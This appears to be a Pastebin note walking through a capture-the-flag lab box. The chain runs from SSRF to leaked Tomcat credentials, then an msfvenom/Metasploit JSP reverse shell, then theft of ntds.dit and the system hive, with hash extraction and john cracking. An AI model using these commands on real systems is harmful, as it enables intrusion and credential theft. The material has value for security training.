Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Fare share of dirb we find a tomcat 8.5.5 on port 8080
- and some weird browser to port 60000
- SSRF 10.10.10.55:60000
- https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/
- http://10.10.10.55:60000/url.php?path=http://10.10.10.55:60000/server-status/
- 0-1 - 0/0/7001 . 0.25 4725 0 0.0 0.00 2.36 127.0.0.1 127.0.0.1:888 OPTIONS * HTTP/1.0
- 1-1 22045 0/6616/7645 _ 1.87 238 2 0.0 2.32 2.70 10.10.15.32 127.0.0.1:60000 NULL
- 2-1 22046 0/6631/7252 _ 1.86 280 9 0.0 2.32 2.50 10.10.15.32 127.0.0.1:60000 NULL
- 3-1 - 0/0/6767 . 0.24 4729 0 0.0 0.00 2.25 127.0.0.1 127.0.0.1:888 OPTIONS * HTTP/1.0
- 4-1 - 0/0/7373 . 2.05 4728 0 0.0 0.00 2.88 127.0.0.1 127.0.0.1:888 OPTIONS * HTTP/1.0
- 5-1 - 0/0/7242 . 2.01 4724 0 0.0 0.00 2.62 127.0.0.1 127.0.0.1:888 OPTIONS * HTTP/1.0
- http://10.10.10.55:60000/url.php?path=127.0.0.1:888
- find ?doc=backup
- view-source:http://10.10.10.55:60000/url.php?path=127.0.0.1:888?doc=backup
- bingo
- <user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>
- log into tomcat
- upload war reverse shell
- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
- use exploit/multi/handler
- set PAYLOAD java/jsp_shell_reverse_tcp
- set LHOST <LHOST value>
- set LPORT <LPORT value>
- set ExitOnSession false
- exploit -j -z
- sessions -i 1
- python -c 'import pty;pty.spawn("/bin/bash");'
- find the ntds.dit
- php -S 10.10.10.55:8888
- wget 10.10.10.55:8888/X.dit
- wget 10.10.10.55:8888/X.bin
- NOTWORKING ***https://didierstevens.files.wordpress.com/2016/07/20160710-211607.png***
- https://implicitdeny.org/2016/05/cracking-domain-passwords-ntds-dit-metasploit-john/
- Get tools :
- git clone https://github.com/libyal/libesedb
- git clone https://github.com/csababarta/ntdsxtract
- build needed tools :
- sudo apt install autoconf automake autopoint libtool pkg-config
- ./synclibs.sh
- ./autogen.sh
- ./configure
- make
- sudo ldconfig
- esedbtools/esedbexport -m tables /root/20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
- esedbexport 20171002
- Opening file.
- Exporting table 1 (MSysObjects) out of 12.
- Exporting table 2 (MSysObjectsShadow) out of 12.
- Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
- Exporting table 4 (datatable) out of 12.
- Exporting table 5 (hiddentable) out of 12.
- Exporting table 6 (link_table) out of 12.
- Exporting table 7 (sdpropcounttable) out of 12.
- Exporting table 8 (sdproptable) out of 12.
- Exporting table 9 (sd_table) out of 12.
- Exporting table 10 (MSysDefrag2) out of 12.
- Exporting table 11 (quota_table) out of 12.
- Exporting table 12 (quota_rebuild_progress_table) out of 12.
- Export completed.
- python /root/ntdsxtract/dsusers.py datatable.3 link_table.5 extract/ --lmoutfile LM.out --ntoutfile NT.out --passwordhashes --pwdformat john --syshive system.bin
- john --rules=all --fork=2 extract/NT.out
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement